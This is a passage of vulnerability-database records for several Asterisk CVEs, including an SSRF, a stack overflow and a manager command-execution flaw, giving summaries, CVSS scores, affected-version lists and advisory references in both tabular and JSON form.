              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.13:cert1_rc1:*:*:*:*:*:*",
              "matchCriteriaId": "2ED8E415-64FA-4E77-A423-3478E606E58E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.13:cert1_rc2:*:*:*:*:*:*",
              "matchCriteriaId": "E13CA1DD-B384-4408-B4EC-1AA829981016",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.13:cert1_rc3:*:*:*:*:*:*",
              "matchCriteriaId": "EE28BD0A-EA30-4265-A5D6-0390F3558D44",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.13:cert1_rc4:*:*:*:*:*:*",
              "matchCriteriaId": "0F82048D-C65F-4439-BBE4-2D4A9B07EB7E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.13:cert2:*:*:*:*:*:*",
              "matchCriteriaId": "6447B77F-3770-4703-9188-B7344ED98E94",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.13:cert3:*:*:*:*:*:*",
              "matchCriteriaId": "5C103924-1D61-4090-8ED5-4731371B2B2C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.13:cert4:*:*:*:*:*:*",
              "matchCriteriaId": "08F87B09-3867-4CAE-BAD7-2206CD6CAF97",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "In Asterisk 11.x before 11.25.3, 13.x before 13.17.2, and 14.x before 14.6.2 and Certified Asterisk 11.x before 11.6-cert18 and 13.x before 13.13-cert6, insufficient RTCP packet validation could allow reading stale buffer contents and when combined with the \"nat\" and \"symmetric_rtp\" options allow redirecting where Asterisk sends the next RTCP report."
    },
    {
      "lang": "es",
      "value": "En Asterisk enversiones 11.x anteriores a la 11.25.3, versiones 13.x anteriores a la 13.17.2 y versiones 14.x anteriores a la 14.6.2; y en Certified Asterisk en versiones 11.x anteriores a la 11.6-cert18 y versiones 13.x anteriores a la 13.13-cert6, una validaci\u00f3n insuficiente de paquetes RTCP podr\u00eda permitir la lectura de contenidos obsoletos del b\u00fafer y, cuando se combina con las opciones \"nat\" y \"symmetric_rtp\", permite las redirecciones en las que Asterisk env\u00eda el siguiente informe RTCP."
    }
  ],
  "id": "CVE-2017-14603",
  "lastModified": "2024-11-21T03:13:11.153",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "NONE",
          "baseScore": 5.0,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV30": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 7.5,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "NONE",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
          "version": "3.0"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 3.6,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2017-10-10T01:30:21.860",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2017-008.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "http://www.debian.org/security/2017/dsa-3990"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Issue Tracking",
        "Third Party Advisory"
      ],
      "url": "https://issues.asterisk.org/jira/browse/ASTERISK-27274"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2017-008.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "http://www.debian.org/security/2017/dsa-3990"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Issue Tracking",
        "Third Party Advisory"
      ],
      "url": "https://issues.asterisk.org/jira/browse/ASTERISK-27274"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-200"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd

Published

2022-04-15 05:15

Modified

2024-11-21 06:54

Severity ?

9.1 (Critical) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Summary

An SSRF issue was discovered in Asterisk through 19.x. When using STIR/SHAKEN, it's possible to send arbitrary requests (such as GET) to interfaces such as localhost by using the Identity header. This is fixed in 16.25.2, 18.11.2, and 19.3.2.

References

URL	Tags
cve@mitre.org	http://packetstormsecurity.com/files/166745/Asterisk-Project-Security-Advisory-AST-2022-002.html	Patch, Third Party Advisory, VDB Entry
cve@mitre.org	https://downloads.asterisk.org/pub/security/	Vendor Advisory
cve@mitre.org	https://downloads.asterisk.org/pub/security/AST-2022-002.html	Patch, Vendor Advisory
cve@mitre.org	https://lists.debian.org/debian-lts-announce/2022/11/msg00021.html	Issue Tracking, Third Party Advisory
cve@mitre.org	https://www.debian.org/security/2022/dsa-5285	Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	http://packetstormsecurity.com/files/166745/Asterisk-Project-Security-Advisory-AST-2022-002.html	Patch, Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108	https://downloads.asterisk.org/pub/security/	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	https://downloads.asterisk.org/pub/security/AST-2022-002.html	Patch, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	https://lists.debian.org/debian-lts-announce/2022/11/msg00021.html	Issue Tracking, Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	https://www.debian.org/security/2022/dsa-5285	Third Party Advisory

Impacted products

Vendor	Product	Version
digium	asterisk	*
digium	asterisk	*
digium	asterisk	*
debian	debian_linux	10.0
debian	debian_linux	11.0

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "D8AB56FA-AEC6-4A6F-B420-DDBF3390379B",
              "versionEndIncluding": "16.25.1",
              "versionStartIncluding": "16.15.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "496A20DA-23D7-435B-8EA9-3AC585DAAB72",
              "versionEndExcluding": "18.11.2",
              "versionStartIncluding": "18.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "C25BFFCA-90FE-475D-88A7-3BC281B830AF",
              "versionEndIncluding": "19.3.1",
              "versionStartIncluding": "19.0.0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:debian:debian_linux:11.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "FA6FEEC2-9F11-4643-8827-749718254FED",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "An SSRF issue was discovered in Asterisk through 19.x. When using STIR/SHAKEN, it\u0027s possible to send arbitrary requests (such as GET) to interfaces such as localhost by using the Identity header. This is fixed in 16.25.2, 18.11.2, and 19.3.2."
    },
    {
      "lang": "es",
      "value": "Se ha detectado un problema de tipo SSRF en Asterisk versiones hasta 19.x. Cuando es usado STIR/SHAKEN, es posible enviar peticiones arbitrarias (como GET) a interfaces como localhost usando el encabezado Identity. Esto ha sido corregido en versiones 16.25.2, 18.11.2 y 19.3.2"
    }
  ],
  "id": "CVE-2022-26499",
  "lastModified": "2024-11-21T06:54:03.990",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "NONE",
          "baseScore": 6.4,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 4.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 9.1,
          "baseSeverity": "CRITICAL",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 5.2,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2022-04-15T05:15:06.640",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch",
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://packetstormsecurity.com/files/166745/Asterisk-Project-Security-Advisory-AST-2022-002.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://downloads.asterisk.org/pub/security/"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "https://downloads.asterisk.org/pub/security/AST-2022-002.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Issue Tracking",
        "Third Party Advisory"
      ],
      "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00021.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "https://www.debian.org/security/2022/dsa-5285"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch",
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://packetstormsecurity.com/files/166745/Asterisk-Project-Security-Advisory-AST-2022-002.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://downloads.asterisk.org/pub/security/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "https://downloads.asterisk.org/pub/security/AST-2022-002.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Issue Tracking",
        "Third Party Advisory"
      ],
      "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00021.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "https://www.debian.org/security/2022/dsa-5285"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-918"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd

Published

2005-07-05 04:00

Modified

2024-11-20 23:58

Severity ?

Summary

Stack-based buffer overflow in the function that parses commands in Asterisk 1.0.7, when the 'write = command' option is enabled, allows remote attackers to execute arbitrary code via a command that has two double quotes followed by a tab character.

References

URL	Tags
cve@mitre.org	http://marc.info/?l=bugtraq&m=111946399501080&w=2
cve@mitre.org	http://www.portcullis-security.com/advisory/advisory-05-013.txt	Vendor Advisory
cve@mitre.org	https://exchange.xforce.ibmcloud.com/vulnerabilities/21115
af854a3a-2127-422b-91ae-364da2661108	http://marc.info/?l=bugtraq&m=111946399501080&w=2
af854a3a-2127-422b-91ae-364da2661108	http://www.portcullis-security.com/advisory/advisory-05-013.txt	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	https://exchange.xforce.ibmcloud.com/vulnerabilities/21115

Impacted products

	Vendor	Product	Version
	digium	asterisk	1.0.7

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.0.7:*:*:*:*:*:*:*",
              "matchCriteriaId": "46C60C04-EF59-4F5C-96E5-A6E693EA9A06",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Stack-based buffer overflow in the function that parses commands in Asterisk 1.0.7, when the \u0027write = command\u0027 option is enabled, allows remote attackers to execute arbitrary code via a command that has two double quotes followed by a tab character."
    }
  ],
  "id": "CVE-2005-2081",
  "lastModified": "2024-11-20T23:58:45.387",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "NONE",
          "baseScore": 5.0,
          "confidentialityImpact": "NONE",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2005-07-05T04:00:00.000",
  "references": [
    {
      "source": "cve@mitre.org",
      "url": "http://marc.info/?l=bugtraq\u0026m=111946399501080\u0026w=2"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://www.portcullis-security.com/advisory/advisory-05-013.txt"
    },
    {
      "source": "cve@mitre.org",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/21115"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://marc.info/?l=bugtraq\u0026m=111946399501080\u0026w=2"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://www.portcullis-security.com/advisory/advisory-05-013.txt"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/21115"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "NVD-CWE-Other"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd

Published

2011-04-27 00:55

Modified

2024-11-21 01:26

Severity ?

Summary

manager.c in the Manager Interface in Asterisk Open Source 1.4.x before 1.4.40.1, 1.6.1.x before 1.6.1.25, 1.6.2.x before 1.6.2.17.3, and 1.8.x before 1.8.3.3 and Asterisk Business Edition C.x.x before C.3.6.4 does not properly check for the system privilege, which allows remote authenticated users to execute arbitrary commands via an Originate action that has an Async header in conjunction with an Application header.

References

URL	Tags
secalert@redhat.com	http://downloads.digium.com/pub/security/AST-2011-006.html	Vendor Advisory
secalert@redhat.com	http://lists.fedoraproject.org/pipermail/package-announce/2011-April/058922.html
secalert@redhat.com	http://lists.fedoraproject.org/pipermail/package-announce/2011-May/059702.html
secalert@redhat.com	http://openwall.com/lists/oss-security/2011/04/22/6
secalert@redhat.com	http://secunia.com/advisories/44197	Vendor Advisory
secalert@redhat.com	http://secunia.com/advisories/44529
secalert@redhat.com	http://securitytracker.com/id?1025433
secalert@redhat.com	http://www.debian.org/security/2011/dsa-2225
secalert@redhat.com	http://www.securityfocus.com/bid/47537
secalert@redhat.com	http://www.vupen.com/english/advisories/2011/1086	Vendor Advisory
secalert@redhat.com	http://www.vupen.com/english/advisories/2011/1107
secalert@redhat.com	http://www.vupen.com/english/advisories/2011/1188
af854a3a-2127-422b-91ae-364da2661108	http://downloads.digium.com/pub/security/AST-2011-006.html	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://lists.fedoraproject.org/pipermail/package-announce/2011-April/058922.html
af854a3a-2127-422b-91ae-364da2661108	http://lists.fedoraproject.org/pipermail/package-announce/2011-May/059702.html
af854a3a-2127-422b-91ae-364da2661108	http://openwall.com/lists/oss-security/2011/04/22/6
af854a3a-2127-422b-91ae-364da2661108	http://secunia.com/advisories/44197	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://secunia.com/advisories/44529
af854a3a-2127-422b-91ae-364da2661108	http://securitytracker.com/id?1025433
af854a3a-2127-422b-91ae-364da2661108	http://www.debian.org/security/2011/dsa-2225
af854a3a-2127-422b-91ae-364da2661108	http://www.securityfocus.com/bid/47537
af854a3a-2127-422b-91ae-364da2661108	http://www.vupen.com/english/advisories/2011/1086	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://www.vupen.com/english/advisories/2011/1107
af854a3a-2127-422b-91ae-364da2661108	http://www.vupen.com/english/advisories/2011/1188

Impacted products

Vendor	Product	Version
digium	asterisk	1.4.0
digium	asterisk	1.4.0
digium	asterisk	1.4.0
digium	asterisk	1.4.0
digium	asterisk	1.4.0
digium	asterisk	1.4.1
digium	asterisk	1.4.2
digium	asterisk	1.4.3
digium	asterisk	1.4.10
digium	asterisk	1.4.10.1
digium	asterisk	1.4.11
digium	asterisk	1.4.12
digium	asterisk	1.4.12.1
digium	asterisk	1.4.13
digium	asterisk	1.4.14
digium	asterisk	1.4.15
digium	asterisk	1.4.16
digium	asterisk	1.4.16.1
digium	asterisk	1.4.16.2
digium	asterisk	1.4.17
digium	asterisk	1.4.18
digium	asterisk	1.4.19
digium	asterisk	1.4.19
digium	asterisk	1.4.19
digium	asterisk	1.4.19
digium	asterisk	1.4.19
digium	asterisk	1.4.19.1
digium	asterisk	1.4.19.2
digium	asterisk	1.4.20
digium	asterisk	1.4.20
digium	asterisk	1.4.20
digium	asterisk	1.4.20
digium	asterisk	1.4.20.1
digium	asterisk	1.4.21
digium	asterisk	1.4.21
digium	asterisk	1.4.21
digium	asterisk	1.4.21.1
digium	asterisk	1.4.21.2
digium	asterisk	1.4.22
digium	asterisk	1.4.22
digium	asterisk	1.4.22
digium	asterisk	1.4.22
digium	asterisk	1.4.22
digium	asterisk	1.4.22
digium	asterisk	1.4.22.1
digium	asterisk	1.4.22.2
digium	asterisk	1.4.23
digium	asterisk	1.4.23
digium	asterisk	1.4.23
digium	asterisk	1.4.23
digium	asterisk	1.4.23
digium	asterisk	1.4.23.1
digium	asterisk	1.4.23.2
digium	asterisk	1.4.24
digium	asterisk	1.4.24
digium	asterisk	1.4.24.1
digium	asterisk	1.4.25
digium	asterisk	1.4.25
digium	asterisk	1.4.25.1
digium	asterisk	1.4.26
digium	asterisk	1.4.26
digium	asterisk	1.4.26
digium	asterisk	1.4.26
digium	asterisk	1.4.26
digium	asterisk	1.4.26
digium	asterisk	1.4.26
digium	asterisk	1.4.26.1
digium	asterisk	1.4.26.2
digium	asterisk	1.4.26.3
digium	asterisk	1.4.27
digium	asterisk	1.4.27
digium	asterisk	1.4.27
digium	asterisk	1.4.27
digium	asterisk	1.4.27
digium	asterisk	1.4.27
digium	asterisk	1.4.27.1
digium	asterisk	1.4.28
digium	asterisk	1.4.28
digium	asterisk	1.4.29
digium	asterisk	1.4.29
digium	asterisk	1.4.29.1
digium	asterisk	1.4.30
digium	asterisk	1.4.30
digium	asterisk	1.4.30
digium	asterisk	1.4.31
digium	asterisk	1.4.31
digium	asterisk	1.4.31
digium	asterisk	1.4.32
digium	asterisk	1.4.32
digium	asterisk	1.4.33
digium	asterisk	1.4.33
digium	asterisk	1.4.33
digium	asterisk	1.4.33.1
digium	asterisk	1.4.34
digium	asterisk	1.4.34
digium	asterisk	1.4.34
digium	asterisk	1.4.35
digium	asterisk	1.4.35
digium	asterisk	1.4.36
digium	asterisk	1.4.36
digium	asterisk	1.4.37
digium	asterisk	1.4.37
digium	asterisk	1.4.38
digium	asterisk	1.4.38
digium	asterisk	1.4.39
digium	asterisk	1.4.39
digium	asterisk	1.4.39.1
digium	asterisk	1.4.39.2
digium	asterisk	1.4.40
digium	asterisk	1.4.40
digium	asterisk	1.4.40
digium	asterisk	1.4.40
digium	asterisk	1.6.2.0
digium	asterisk	1.6.2.0
digium	asterisk	1.6.2.0
digium	asterisk	1.6.2.0
digium	asterisk	1.6.2.0
digium	asterisk	1.6.2.0
digium	asterisk	1.6.2.0
digium	asterisk	1.6.2.0
digium	asterisk	1.6.2.1
digium	asterisk	1.6.2.1
digium	asterisk	1.6.2.2
digium	asterisk	1.6.2.3
digium	asterisk	1.6.2.4
digium	asterisk	1.6.2.5
digium	asterisk	1.6.2.6
digium	asterisk	1.6.2.6
digium	asterisk	1.6.2.6
digium	asterisk	1.6.2.15
digium	asterisk	1.6.2.16
digium	asterisk	1.6.2.16
digium	asterisk	1.6.2.16.1
digium	asterisk	1.6.2.16.2
digium	asterisk	1.6.2.17
digium	asterisk	1.6.2.17
digium	asterisk	1.6.2.17
digium	asterisk	1.6.2.17
digium	asterisk	1.6.2.17.1
digium	asterisk	1.6.2.17.2
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.1
digium	asterisk	1.8.1
digium	asterisk	1.8.1.1
digium	asterisk	1.8.1.2
digium	asterisk	1.8.2
digium	asterisk	1.8.2.1
digium	asterisk	1.8.2.2
digium	asterisk	1.8.2.3
digium	asterisk	1.8.2.4
digium	asterisk	1.8.3
digium	asterisk	1.8.3
digium	asterisk	1.8.3
digium	asterisk	1.8.3
digium	asterisk	1.8.3.1
digium	asterisk	1.8.3.2
digium	asterisk	c.1.0
digium	asterisk	c.1.0
digium	asterisk	c.1.6
digium	asterisk	c.1.6.1
digium	asterisk	c.1.6.2
digium	asterisk	c.1.8.0
digium	asterisk	c.1.8.1
digium	asterisk	c.2.3
digium	asterisk	c.3.0
digium	asterisk	c.3.1.0
digium	asterisk	c.3.1.1
digium	asterisk	c.3.2.2
digium	asterisk	c.3.2.3
digium	asterisk	c.3.3.2
digium	asterisk	c.3.6.2
digium	asterisk	c.3.6.3
digium	asterisk	1.6.1.0
digium	asterisk	1.6.1.0
digium	asterisk	1.6.1.0
digium	asterisk	1.6.1.0
digium	asterisk	1.6.1.0
digium	asterisk	1.6.1.1
digium	asterisk	1.6.1.2
digium	asterisk	1.6.1.3
digium	asterisk	1.6.1.4
digium	asterisk	1.6.1.5
digium	asterisk	1.6.1.5
digium	asterisk	1.6.1.6
digium	asterisk	1.6.1.7
digium	asterisk	1.6.1.7
digium	asterisk	1.6.1.8
digium	asterisk	1.6.1.9
digium	asterisk	1.6.1.10
digium	asterisk	1.6.1.10
digium	asterisk	1.6.1.10
digium	asterisk	1.6.1.10
digium	asterisk	1.6.1.11
digium	asterisk	1.6.1.12
digium	asterisk	1.6.1.12
digium	asterisk	1.6.1.13
digium	asterisk	1.6.1.13
digium	asterisk	1.6.1.14
digium	asterisk	1.6.1.15
digium	asterisk	1.6.1.16
digium	asterisk	1.6.1.17
digium	asterisk	1.6.1.18
digium	asterisk	1.6.1.18
digium	asterisk	1.6.1.18
digium	asterisk	1.6.1.19
digium	asterisk	1.6.1.19
digium	asterisk	1.6.1.19
digium	asterisk	1.6.1.19
digium	asterisk	1.6.1.20
digium	asterisk	1.6.1.20
digium	asterisk	1.6.1.20
digium	asterisk	1.6.1.21
digium	asterisk	1.6.1.22
digium	asterisk	1.6.1.23
digium	asterisk	1.6.1.24

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "6E56DB29-571D-4615-B347-38CF4590E463",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.0:beta1:*:*:*:*:*:*",
              "matchCriteriaId": "FC1188DA-6C27-48D2-9CE7-74D77B24EE9E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.0:beta2:*:*:*:*:*:*",
              "matchCriteriaId": "A93B8F91-5C56-44DE-AE29-8468E853759F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.0:beta3:*:*:*:*:*:*",
              "matchCriteriaId": "BF7F4D02-7C8E-403C-A53E-A5F8C07F33A7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.0:beta4:*:*:*:*:*:*",
              "matchCriteriaId": "D85031A3-3444-4650-905D-721F1EBAA24F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "6F0AC2B3-6E8A-4B26-8A6C-792D9E5072C7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "2BC8D6D4-A389-4A78-8DA8-351A9CB896E0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "5E979AC4-58EA-4297-9F90-350924BBE440",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.10:*:*:*:*:*:*:*",
              "matchCriteriaId": "D9154EDB-CAE6-4BB0-8D02-9EC2B81D93C9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.10.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "A432B0A7-F158-4B9C-97F6-6A29DB13EAFA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.11:*:*:*:*:*:*:*",
              "matchCriteriaId": "687C67CB-46AF-40C2-8A02-081C7F78568A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.12:*:*:*:*:*:*:*",
              "matchCriteriaId": "6E8D6EC0-A61E-4DBC-A0C7-864E9C4BDA1A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.12.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "2EF7F65A-45FD-4586-901E-49B057100BB4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.13:*:*:*:*:*:*:*",
              "matchCriteriaId": "300F158E-ED27-46C8-85E4-AA0AA6B201DB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.14:*:*:*:*:*:*:*",
              "matchCriteriaId": "FB6F04C0-3226-4D2C-97A3-39999483C62C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.15:*:*:*:*:*:*:*",
              "matchCriteriaId": "30685A20-963A-48D4-B7D7-2C11C2C812AA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.16:*:*:*:*:*:*:*",
              "matchCriteriaId": "C54C3AAC-4D5D-4661-86AB-6849982E8C67",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.16.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "6F847916-89F1-4AA6-973D-6002C8B54EE8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.16.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "5359815E-671A-4DFD-9E99-8CF903A03C84",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.17:*:*:*:*:*:*:*",
              "matchCriteriaId": "E2EFBC9E-4DCA-43CB-93EB-6807E2383A98",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.18:*:*:*:*:*:*:*",
              "matchCriteriaId": "98755B1B-CAD5-4AC5-8571-52E67C3A8274",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.19:*:*:*:*:*:*:*",
              "matchCriteriaId": "C9D8C8FE-3D09-4F60-AD03-9D4439942141",
